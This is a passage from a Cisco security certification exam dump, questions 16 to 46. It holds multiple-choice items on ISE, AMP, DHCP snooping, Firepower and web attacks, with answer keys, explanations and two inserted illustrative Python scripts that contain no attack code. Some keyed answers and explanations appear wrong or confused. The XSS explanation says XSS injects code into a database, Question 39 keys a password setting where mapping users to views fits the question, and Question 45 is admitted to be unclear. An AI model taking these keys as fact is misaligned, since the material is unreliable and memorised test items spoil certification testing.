Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-analytics/white-paper-c11-740380.html

Question 16

Due to a traffic storm on the network, two interfaces were error-disabled, and both interfaces sent SNMP
traps. Which two actions must be taken to ensure that interfaces are put back into service? (Choose two)

A. Have Cisco Prime Infrastructure issue an SNMP set command to re-enable the ports after the
preconfigured interval.
B. Use EEM to have the ports return to service automatically in less than 300 seconds.
C. Enter the shutdown and no shutdown commands on the interfaces.
D. Enable the snmp-server enable traps command and wait 300 seconds
E. Ensure that interfaces are configured with the error-disable detection and recovery feature

Answer: C E

Explanation

You can also bring up the port by using these commands:
+ The “shutdown” interface configuration command followed by the “no shutdown” interface configuration
command restarts the disabled port.
+ The “errdisable recovery cause …” global configuration command enables the timer to automatically
recover error-disabled state, and the “errdisable recovery interval interval” global configuration command
specifies the time to recover error-disabled state.

Question 17

What is the difference between Cross-site Scripting and SQL Injection attacks?

A. Cross-site Scripting is an attack where code is injected into a database, whereas SQL Injection is an
attack where code is injected into a browser.
B. Cross-site Scripting is a brute force attack targeting remote sites, whereas SQL Injection is a social
engineering attack.
C. Cross-site Scripting is when executives in a corporation are attacked, whereas SQL Injection is when a
database is manipulated.
D. Cross-site Scripting is an attack where code is executed from the server side, whereas SQL Injection is
an attack where code is executed from the client side.

Answer: A

Explanation

Answer B is not correct because Cross-site Scripting (XSS) is not a brute force attack.
Answer C is not correct because the statement “Cross-site Scripting is when executives in a corporation
are attacked” is not true. XSS is a client-side vulnerability that targets other application users.
Answer D is not correct because the statement “Cross-site Scripting is an attack where code is executed
from the server side” is not true. In fact, XSS is a method that exploits a website vulnerability by injecting
scripts that will run at the client’s side.

Therefore only answer A is left. In XSS, an attacker will try to inject his malicious code (usually malicious
links) into a database. When other users follow his links, their web browsers are redirected to websites
where attackers can steal data from them. In a SQL Injection, an attacker will try to inject SQL code (via
his browser) into forms, cookies, or HTTP headers that do not use data sanitizing or validation methods of
GET/POST parameters.

Note: The main difference between a SQL and XSS injection attack is that SQL injection attacks are used
to steal information from databases whereas XSS attacks are used to redirect users to websites where
attackers can steal data from them.

Question 18

A network administrator is configuring a switch to use Cisco ISE for 802.1X. An endpoint is failing
authentication and is unable to access the network. Where should the administrator begin troubleshooting
to verify the authentication details?

A. Adaptive Network Control Policy List
B. Context Visibility
C. Accounting Reports
D. RADIUS Live Logs

Answer: D

Explanation

How To Troubleshoot ISE Failed Authentications & Authorizations

Check the ISE Live Logs

Log in to the primary ISE Policy Administration Node (PAN).
Go to Operations > RADIUS > Live Logs
(Optional) If the event is not present in the RADIUS Live Logs, go to Operations > Reports > Reports >
Endpoints and Users > RADIUS Authentications
Check for Any Failed Authentication Attempts in the Log

Reference: https://community.cisco.com/t5/security-documents/how-to-troubleshoot-ise-failed-authentications-amp/ta-p/3630960

Question 19

What is a prerequisite when integrating a Cisco ISE server and an AD domain?

A. Place the Cisco ISE server and the AD server in the same subnet
B. Configure a common administrator account
C. Configure a common DNS server
D. Synchronize the clocks of the Cisco ISE server and the AD server

Answer: D

Explanation

The following are the prerequisites to integrate Active Directory with Cisco ISE.
+ Use the Network Time Protocol (NTP) server settings to synchronize the time between the Cisco ISE
server and Active Directory. You can configure NTP settings from Cisco ISE CLI.

+ If your Active Directory structure has multidomain forest or is divided into multiple forests, ensure that
trust relationships exist between the domain to which Cisco ISE is connected and the other domains that
have user and machine information to which you need access. For more information on establishing trust
relationships, refer to Microsoft Active Directory documentation.

+ You must have at least one global catalog server operational and accessible by Cisco ISE, in the domain
to which you are joining Cisco ISE.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-0/ise_active_directory_integration/b_ISE_AD_integration_2x.html#reference_8DC463597A644A5C9CF5D582B77BB24F

Question 20

An organization recently installed a Cisco WSA and would like to take advantage of the AVC engine to
allow the organization to create a policy to control application specific activity. After enabling the AVC
engine, what must be done to implement this?

A. Use security services to configure the traffic monitor.
B. Use URL categorization to prevent the application traffic.
C. Use an access policy group to configure application control settings.
D. Use web security reporting to validate engine functionality

Answer: C

Explanation

The Application Visibility and Control (AVC) engine lets you create policies to control application activity on
the network without having to fully understand the underlying technology of each application. You can
configure application control settings in Access Policy groups. You can block or allow applications
individually or according to application type. You can also apply controls to particular application types.

Question 21

Which method is used to deploy certificates and configure the supplicant on mobile devices to gain access
to network resources?

A. BYOD onboarding
B. Simple Certificate Enrollment Protocol
C. Client provisioning
D. MAC authentication bypass

Answer: A

Explanation

When supporting personal devices on a corporate network, you must protect network services and
enterprise data by authenticating and authorizing users (employees, contractors, and guests) and their
devices. Cisco ISE provides the tools you need to allow employees to securely use personal devices on a
corporate network.

Guests can add their personal devices to the network by running the native supplicant provisioning
(Network Setup Assistant), or by adding their devices to the My Devices portal.

Because native supplicant profiles are not available for all devices, users can use the My Devices portal to
add these devices manually; or you can configure Bring Your Own Device (BYOD) rules to register these
devices.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-4/admin_guide/b_ISE_admin_guide_24/m_ise_devices_byod.html

Question 22

Refer to the exhibit.

import requests

url = "https://api.amp.cisco.com/v1/computers"
headers = {
    'accept': "application/json",
    'content-type': "application/json",
    'authorization': "Basic API Credentials",   # placeholder shown in the exhibit
    'cache-control': "no-cache"
}
response = requests.request("GET", url, headers=headers)
print(response.text)

What will happen when this Python script is run?

A. The compromised computers and malware trajectories will be received from Cisco AMP
B. The list of computers and their current vulnerabilities will be received from Cisco AMP
C. The compromised computers and what compromised them will be received from Cisco AMP
D. The list of computers, policies, and connector statuses will be received from Cisco AMP

Answer: D

Explanation

A call to the “https://api.amp.cisco.com/v1/computers” API fetches the list of computers across
your organization that Advanced Malware Protection (AMP) sees.

Reference: https://api-docs.amp.cisco.com/api_actions/details?api_action=GET+%2Fv1%2Fcomputers&api_host=api.apjc.amp.cisco.com&api_resource=Computer&api_version=v1

It also lists policies and connector statuses. The figure below shows partial output of this script:

Question 23

An organization is trying to implement micro-segmentation on the network and wants to be able to gain
visibility on the applications within the network. The solution must be able to maintain and force
compliance. Which product should be used to meet these requirements?

A. Cisco Umbrella
B. Cisco AMP
C. Cisco Stealthwatch
D. Cisco Tetration

Answer: D

Explanation

Micro-segmentation secures applications by expressly allowing particular application traffic and, by default,
denying all other traffic. Micro-segmentation is the foundation for implementing a zero-trust security
model for application workloads in the data center and cloud.

Cisco Tetration is an application workload security platform designed to secure your compute instances
across any infrastructure and any cloud. To achieve this, it uses behavior and attribute-driven
microsegmentation policy generation and enforcement. It enables trusted access through automated,
exhaustive context from various systems to automatically adapt security policies.

To generate accurate microsegmentation policy, Cisco Tetration performs application dependency mapping
to discover the relationships between different application tiers and infrastructure services. In addition, the
platform supports “what-if” policy analysis using real-time data or historical data to assist in the validation
and risk assessment of policy application pre-enforcement to ensure ongoing application availability. The
normalized microsegmentation policy can be enforced through the application workload itself for a
consistent approach to workload microsegmentation across any environment, including virtualized, bare-
metal, and container workloads running in any public cloud or any data center. Once the
microsegmentation policy is enforced, Cisco Tetration continues to monitor for compliance deviations,
ensuring the segmentation policy stays up to date as the application behavior changes.

Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-analytics/solution-overview-c22-739268.pdf

Question 24

Which factor must be considered when choosing the on-premise solution over the cloud-based one?

A. With an on-premise solution, the provider is responsible for the installation and maintenance of the
product, whereas with a cloud-based solution, the customer is responsible for it
B. With a cloud-based solution, the provider is responsible for the installation, but the customer is
responsible for the maintenance of the product.
C. With an on-premise solution, the provider is responsible for the installation, but the customer is
responsible for the maintenance of the product.
D. With an on-premise solution, the customer is responsible for the installation and maintenance of the
product, whereas with a cloud-based solution, the provider is responsible for it.

Answer: D

Question 25

Which term describes when the Cisco Firepower downloads threat intelligence updates from Cisco Talos?

A. consumption
B. sharing
C. analysis
D. authoring

Answer: A

Explanation

… we will showcase Cisco Threat Intelligence Director (CTID) an exciting feature on Cisco’s Firepower
Management Center (FMC) product offering that automates the operationalization of threat intelligence.
TID has the ability to consume threat intelligence via STIX over TAXII and allows uploads/downloads of
STIX and simple blacklists.

Reference: https://blogs.cisco.com/developer/automate-threat-intelligence-using-cisco-threat-intelligence-director

Question 26

An organization has a Cisco Stealthwatch Cloud deployment in their environment. Cloud logging is working
as expected, but logs are not being received from the on-premise network. What action will resolve this
issue?

A. Configure security appliances to send syslogs to Cisco Stealthwatch Cloud
B. Configure security appliances to send NetFlow to Cisco Stealthwatch Cloud
C. Deploy a Cisco FTD sensor to send events to Cisco Stealthwatch Cloud
D. Deploy a Cisco Stealthwatch Cloud sensor on the network to send data to Cisco Stealthwatch Cloud

Answer: D

Explanation

You can also monitor on-premises networks in your organization using Cisco Stealthwatch Cloud. In order
to do so, you need to deploy at least one Cisco Stealthwatch Cloud Sensor appliance (virtual or physical
appliance).

Reference: CCNP And CCIE Security Core SCOR 350-701 Official Cert Guide

Question 27

What does Cisco AMP for Endpoints use to help an organization detect different families of malware?

A. Ethos Engine to perform fuzzy fingerprinting
B. Tetra Engine to detect malware when the endpoint is connected to the cloud
C. Clam AV Engine to perform email scanning
D. Spero Engine with machine learning to perform dynamic analysis

Answer: A

Explanation

ETHOS is the Cisco file grouping engine. It allows us to group families of files together so if we see
variants of a malware, we mark the ETHOS hash as malicious and whole families of malware are instantly
detected.

Reference: https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf

ETHOS = Fuzzy Fingerprinting using static/passive heuristics

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2016/pdf/BRKSEC-2139.pdf

Question 28

What are two characteristics of Cisco DNA Center APIs? (Choose two)

A. Postman is required to utilize Cisco DNA Center API calls.
B. They do not support Python scripts.
C. They are Cisco proprietary.
D. They quickly provision new devices.
E. They view the overall health of the network

Answer: D E

Question 29

What is a benefit of conducting device compliance checks?

A. It indicates what type of operating system is connecting to the network.
B. It validates if anti-virus software is installed.
C. It scans endpoints to determine if malicious activity is taking place.
D. It detects email phishing attacks.

Answer: B

Question 30

In which two ways does Easy Connect help control network access when used with Cisco TrustSec?
(Choose two)

A. It allows multiple security products to share information and work together to enhance security posture
in the network.
B. It creates a dashboard in Cisco ISE that provides full visibility of all connected endpoints.
C. It allows for the assignment of Security Group Tags and does not require 802.1x to be configured on
the switch or the endpoint.
D. It integrates with third-party products to provide better visibility throughout the network.
E. It allows for managed endpoints that authenticate to AD to be mapped to Security Groups (PassiveID).

Answer: C E

Explanation

Easy Connect simplifies network access control and segmentation by allowing the assignment of Security
Group Tags to endpoints without requiring 802.1X on those endpoints, whether using wired or wireless
connectivity.

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/enterprise-networks/trustsec/trustsec-with-easy-connect-configuration-guide.pdf

Question 31

What is the benefit of installing Cisco AMP for Endpoints on a network?

A. It provides operating system patches on the endpoints for security.
B. It provides flow-based visibility for the endpoints network connections.
C. It enables behavioral analysis to be used for the endpoints.
D. It protects endpoint systems through application control and real-time scanning

Answer: D

Question 32

An administrator is configuring a DHCP server to better secure their environment. They need to be able to
rate-limit the traffic and ensure that legitimate requests are not dropped. How would this be
accomplished?

A. Set a trusted interface for the DHCP server
B. Set the DHCP snooping bit to 1
C. Add entries in the DHCP snooping database
D. Enable ARP inspection for the required VLAN

Answer: A

Explanation

To understand DHCP snooping we need to learn about the DHCP spoofing attack first.

DHCP spoofing is a type of attack in which the attacker listens for DHCP Requests from clients and answers
them with a fake DHCP Response before the authorized DHCP Response reaches the clients. The fake DHCP
Response often gives the attacker’s IP address as the client’s default gateway, so all the traffic sent from
the client goes through the attacker’s computer: the attacker becomes a “man-in-the-middle”.

The attacker has several ways to make sure the fake DHCP Response arrives first. In fact, if the
attacker is “closer” to the client than the DHCP Server, nothing extra is needed. Alternatively, the attacker
can DoS the DHCP Server so that it cannot send the DHCP Response.

DHCP snooping can prevent DHCP spoofing attacks. DHCP snooping is a Cisco Catalyst feature that
determines which switch ports can respond to DHCP requests. Ports are identified as trusted and
untrusted.

Only ports that connect to an authorized DHCP server are trusted, and allowed to send all types of DHCP
messages. All other ports on the switch are untrusted and can send only DHCP requests. If a DHCP
response is seen on an untrusted port, the port is shut down.
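
As an added illustration (not from the page or from Cisco), the following Python model reproduces the per-port decisions described above: server replies on untrusted ports err-disable the port, trusted ports carry any DHCP message without a rate limit, and untrusted ports are rate-limited. Port names, the numeric message types, and the recover() helper (standing in for the errdisable recovery timer from Question 16) are assumptions; the sample traffic is constructed.

```python
from collections import deque

# DHCP message types (RFC 2132 option 53 values).
DISCOVER, OFFER, REQUEST, DECLINE, ACK, NAK, RELEASE, INFORM = range(1, 9)
# Messages only a DHCP server sends; one of these on an untrusted port
# means a rogue (spoofing) server is answering clients.
SERVER_MESSAGES = {OFFER, ACK, NAK}


class DhcpSnooping:
    """Simulates the trust and rate-limit decisions of a DHCP snooping switch.

    trusted:    ports that connect to the authorized DHCP server.
    rate_limit: maximum DHCP packets per second allowed on an untrusted port
                (assumed value; the kind of limit a snooping rate limit enforces).
    """

    def __init__(self, trusted, rate_limit):
        self.trusted = set(trusted)
        self.rate_limit = rate_limit
        self.err_disabled = set()
        self._window = {}   # port -> deque of packet timestamps in the last second

    def handle(self, port, msg_type, ts):
        """Return 'forward', 'drop' or 'err-disable' for one DHCP packet."""
        if port in self.err_disabled:
            return "drop"                      # shut-down port passes nothing
        if port in self.trusted:
            # Trusted port: every message type is allowed and the rate limit does
            # not apply, so legitimate server responses are never dropped.
            return "forward"
        if msg_type in SERVER_MESSAGES:
            # Server reply on an untrusted port: the page describes the port
            # being shut down, i.e. placed in the err-disabled state.
            self.err_disabled.add(port)
            return "err-disable"
        # Client message on an untrusted port: enforce the per-second limit.
        window = self._window.setdefault(port, deque())
        while window and ts - window[0] >= 1.0:
            window.popleft()                   # forget packets older than 1 s
        window.append(ts)
        if len(window) > self.rate_limit:
            self.err_disabled.add(port)
            return "err-disable"
        return "forward"

    def recover(self, port):
        """Clear the err-disabled state, as the errdisable recovery timer would."""
        self.err_disabled.discard(port)
        self._window.pop(port, None)


def simulate(switch, packets):
    """Apply the switch to a list of (port, msg_type, timestamp) packets."""
    return [switch.handle(*packet) for packet in packets]


if __name__ == "__main__":
    # Constructed sample traffic: Gi1/0/24 faces the real DHCP server.
    sw = DhcpSnooping(trusted={"Gi1/0/24"}, rate_limit=3)
    traffic = [
        ("Gi1/0/1", DISCOVER, 0.00),   # client on an access port
        ("Gi1/0/24", OFFER, 0.01),     # legitimate server reply
        ("Gi1/0/2", OFFER, 0.02),      # rogue server reply -> err-disable
        ("Gi1/0/2", ACK, 0.03),        # port already shut down -> drop
        ("Gi1/0/3", DISCOVER, 1.00),   # burst of four DISCOVERs in 0.3 s
        ("Gi1/0/3", DISCOVER, 1.10),
        ("Gi1/0/3", DISCOVER, 1.20),
        ("Gi1/0/3", DISCOVER, 1.30),   # exceeds rate_limit=3 -> err-disable
    ]
    for packet, verdict in zip(traffic, simulate(sw, traffic)):
        print(packet, "->", verdict)
    print("err-disabled ports:", sorted(sw.err_disabled))
```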

Question 33

Refer to the exhibit.

import requests

client_id = '<Client id>'
api_key = '<API Key>'
url = 'https://api.amp.cisco.com/v1/computers'
response = requests.get(url, auth=(client_id, api_key))
response_json = response.json()
for computer in response_json['data']:
    hostname = computer['hostname']
    print(hostname)

What will happen when the Python script is executed?

A. The hostname will be translated to an IP address and printed.
B. The hostname will be printed for the client in the client ID field.
C. The script will pull all computer hostnames and print them.
D. The script will translate the IP address to FQDN and print it

Answer: C
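
The two exhibit scripts (Question 22 and Question 33) call the same endpoint; the added example below, which is not part of the original page or of Cisco's API documentation, shows that the “Basic API Credentials” header of the first script is what requests builds from the (client_id, api_key) tuple of the second, and then processes a constructed sample response. The “data” and “hostname” fields come from the exhibit; the “policy”, “connector_version” and “active” fields are assumptions standing in for the policy and connector-status details the explanation mentions.

```python
import base64
import json

# Constructed sample response in the shape the exhibit scripts consume: a
# "data" list whose items carry a "hostname". The "policy", "connector_version"
# and "active" keys are assumptions, not taken from the page.
SAMPLE_RESPONSE = json.dumps({
    "data": [
        {"hostname": "WIN-FIN-01", "active": True,
         "connector_version": "7.5.3", "policy": {"name": "Protect"}},
        {"hostname": "MAC-ENG-07", "active": False,
         "connector_version": "1.14.0", "policy": {"name": "Audit"}},
        {"hostname": "LNX-DB-02", "active": True,
         "connector_version": "1.17.2", "policy": {"name": "Protect"}},
        {"active": True, "connector_version": "7.5.3",
         "policy": {"name": "Protect"}},        # record with no hostname
    ]
})


def basic_auth_header(client_id: str, api_key: str) -> str:
    """Build the Authorization value the Question 22 exhibit abbreviates as
    'Basic API Credentials'. requests.get(url, auth=(client_id, api_key)) in
    the Question 33 exhibit sends exactly this header (HTTP Basic auth), so the
    two scripts authenticate identically. Keep the real values in a secret
    store or environment variable rather than in the script."""
    token = base64.b64encode(f"{client_id}:{api_key}".encode()).decode()
    return f"Basic {token}"


def hostnames(body: str) -> list:
    """What the Question 33 loop does: collect every hostname in 'data'.
    Records without a hostname are skipped instead of raising KeyError."""
    payload = json.loads(body)
    return [c["hostname"] for c in payload.get("data", []) if "hostname" in c]


def connector_summary(body: str) -> dict:
    """The policy and connector-status view the Question 22 explanation
    describes: computers per policy, plus hosts whose connector is inactive."""
    payload = json.loads(body)
    per_policy = {}
    inactive = []
    for computer in payload.get("data", []):
        policy = computer.get("policy", {}).get("name", "<no policy>")
        per_policy[policy] = per_policy.get(policy, 0) + 1
        if not computer.get("active", False):
            inactive.append(computer.get("hostname", "<no hostname>"))
    return {"per_policy": per_policy, "inactive": inactive}


if __name__ == "__main__":
    # Placeholder credentials; real ones never belong in source code.
    print(basic_auth_header("client-id-placeholder", "api-key-placeholder"))
    print(hostnames(SAMPLE_RESPONSE))
    print(connector_summary(SAMPLE_RESPONSE))
```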

Question 34

Refer to the exhibit.



When configuring a remote access VPN solution terminating on the Cisco ASA, an administrator would like
to utilize an external token authentication mechanism in conjunction with AAA authentication using
machine certificates. Which configuration item must be modified to allow this?

A. Group Policy
B. Method
C. SAML Server
D. DHCP Servers

Answer: B

Explanation

In order to use AAA along with an external token authentication mechanism, set the “Method” as “Both” in
the Authentication.

Question 35

An engineer has been tasked with implementing a solution that can be leveraged for securing the cloud
users, data, and applications. There is a requirement to use the Cisco cloud native CASB and cloud
cybersecurity platform. What should be used to meet these requirements?

A. Cisco Umbrella
B. Cisco Cloud Email Security
C. Cisco NGFW
D. Cisco Cloudlock

Answer: D

Explanation

Cisco Cloudlock: Secure your cloud users, data, and applications with the cloud-native Cloud Access
Security Broker (CASB) and cloud cybersecurity platform.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cloud-web-security/at-a-glance-c45-738565.pdf

Question 36

An engineer needs a cloud solution that will monitor traffic, create incidents based on events, and
integrate with other cloud solutions via an API. Which solution should be used to accomplish this goal?

A. SIEM
B. CASB
C. Adaptive MFA
D. Cisco Cloudlock

Answer: D

Explanation

+ Cisco Cloudlock continuously monitors cloud environments with a cloud Data Loss Prevention (DLP)
engine to identify sensitive information stored in cloud environments in violation of policy.
+ Cloudlock is API-based.
+ Incidents are a key resource in the Cisco Cloudlock application. They are triggered by the Cloudlock
policy engine when a policy detection criteria result in a match in an object (document, field, folder, post,
or file).

Reference: https://docs.umbrella.com/cloudlock-documentation/docs/endpoints

Note:

+ Security information and event management (SIEM) platforms collect log and event data from security
systems, networks and computers, and turn it into actionable security insights.

+ An incident is a record of the triggering of an alerting policy. Cloud Monitoring opens an incident when a
condition of an alerting policy has been met.

Question 37

Why is it important to implement MFA inside of an organization?

A. To prevent man-in-the-middle attacks from being successful.
B. To prevent DoS attacks from being successful.
C. To prevent brute force attacks from being successful.
D. To prevent phishing attacks from being successful.

Answer: C

Question 38

Drag and drop the solutions from the left onto the solution’s benefits on the right.

Answer:

+ software-defined segmentation that uses SGTs and allows administrators to quickly scale and enforce
policies across the network: Cisco TrustSec
+ rapidly collects and analyzes NetFlow and telemetry data to deliver in-depth visibility and understanding
of network traffic: Cisco Stealthwatch
+ secure Internet gateway in the cloud that provides a security solution that protects endpoints on and off
the network against threats on the Internet by using DNS: Cisco Umbrella
+ obtains contextual identity and profiles for all the users and devices connected on a network: Cisco ISE

Question 39

A network administrator is configuring SNMPv3 on a new router. The users have already been created;
however, an additional configuration is needed to facilitate access to the SNMP views. What must the
administrator do to accomplish this?

A. map SNMPv3 users to SNMP views
B. set the password to be used for SNMPv3 authentication
C. define the encryption algorithm to be used by SNMPv3
D. specify the UDP port used by SNMP

Answer: B

Question 40

An organization is using Cisco Firepower and Cisco Meraki MX for network security and needs to centrally
manage cloud policies across these platforms. Which software should be used to accomplish this goal?

A. Cisco Defense Orchestrator
B. Cisco Secureworks
C. Cisco DNA Center
D. Cisco Configuration Professional

Answer: A

Explanation

Cisco Defense Orchestrator is a cloud-based management solution that allows you to manage security
policies and device configurations with ease across multiple Cisco and cloud-native security platforms.

Cisco Defense Orchestrator features:

….
Management of hybrid environments: Managing a mix of firewalls running the ASA, FTD, and Meraki
MX software is now easy, with the ability to share policy elements across platforms.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/defense-orchestrator/datasheet-c78-736847.html

Question 41

What is a function of 3DES in reference to cryptography?

A. It hashes files.
B. It creates one-time use passwords.
C. It encrypts traffic.
D. It generates private keys.

Answer: C

Question 42

Which risk is created when using an Internet browser to access a cloud-based service?

A. misconfiguration of infrastructure, which allows unauthorized access
B. intermittent connection to the cloud connectors
C. vulnerabilities within protocol
D. insecure implementation of API

Answer: C

Question 43

An organization has a Cisco ESA set up with policies and would like to customize the action assigned for
violations. The organization wants a copy of the message to be delivered with a message added to flag it
as a DLP violation. Which actions must be performed in order to provide this capability?

A. deliver and send copies to other recipients
B. quarantine and send a DLP violation notification
C. quarantine and alter the subject header with a DLP violation
D. deliver and add disclaimer text

Answer: D

Explanation

You specify primary and secondary actions that the appliance will take when it detects a possible DLP
violation in an outgoing message. Different actions can be assigned for different violation types and
severities.
Primary actions include:
– Deliver
– Drop
– Quarantine

Secondary actions include:

– Sending a copy to a policy quarantine if you choose to deliver the message. The copy is a perfect clone
of the original, including the Message ID. Quarantining a copy allows you to test the DLP system before
deployment in addition to providing another way to monitor DLP violations. When you release the copy
from the quarantine, the appliance delivers the copy to the recipient, who will have already received the
original message.
– Encrypting messages. The appliance only encrypts the message body. It does not encrypt the message
headers.
– Altering the subject header of messages containing a DLP violation.
– Adding disclaimer text to messages.
– Sending messages to an alternate destination mailhost.
– Sending copies (bcc) of messages to other recipients. (For example, you could copy messages with
critical DLP violations to a compliance officer’s mailbox for examination.)
– Sending a DLP violation notification message to the sender or other contacts, such as a manager or DLP
compliance officer.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_chapter_010001.html

Question 44

Drag and drop the common security threats from left onto the definitions on the right.

Answer:

+ group of computers connected to the Internet that have been compromised by a hacker using a virus or
Trojan horse: botnet
+ a software program that copies itself from one computer to another, without human interaction: worm
+ fraudulent attempts by cyber criminals to obtain private information: phishing
+ unwanted messages in an email inbox: spam

Question 45

Refer to the exhibit.



An administrator is adding a new Cisco FTD device to their network and wants to manage it with Cisco
FMC. The Cisco FTD is not behind a NAT device. Which command is needed to enable this on the Cisco
FTD?

A. configure manager add DONTRESOLVE <registration key>
B. configure manager add <FMC IP address> <registration key> 16
C. configure manager add DONTRESOLVE <registration key> FTD123
D. configure manager add <FMC IP address> <registration key>

Answer: D

Explanation

The “Add device” dialog above is from the FMC when we want to add a new FTD. To let the FMC manage the
FTD, first add the manager from the FTD and assign a registration key of your choice with the
command configure manager add 1.1.1.1 the_registration_key_you_want (suppose 1.1.1.1 is the IP
address of the FMC). You need to use the same registration key in the FMC when adding this FTD as a
managed device.

Reference: https://cyruslab.net/2019/09/03/ciscocisco-firepower-lab-setup/

In fact, this question is unclear; please read the note below:

Note:

According to this Cisco reference:

– If the FMC is behind a NAT device, enter a unique NAT ID along with the registration key, and specify
DONTRESOLVE instead of the hostname, for example:

Example:
> configure manager add DONTRESOLVE regk3y78 natid90

– If the FTD is behind a NAT device, enter a unique NAT ID along with the FMC IP address or hostname,
for example:

Example:
> configure manager add 10.70.45.5 regk3y78 natid56

Now return to our question. In the exhibit we see a value of 16 in the “Unique NAT ID” field, and the question
states that the “FTD is not behind a NAT device”, so we can only suppose the FMC is behind a NAT device. The
correct solution should then be “configure manager add DONTRESOLVE <registration key> 16”, but there is no
such answer. Therefore we have to suppose there is no NAT device between the FMC and the FTD.

Question 46

A switch with Dynamic ARP Inspection enabled has received a spoofed ARP response on a trusted
interface. How does the switch behave in this situation?

A. It forwards the packet after validation by using the MAC Binding Table.
B. It drops the packet after validation by using the IP & MAC Binding Table.
C. It forwards the packet without validation.
D. It drops the packet without validation.

Answer: C
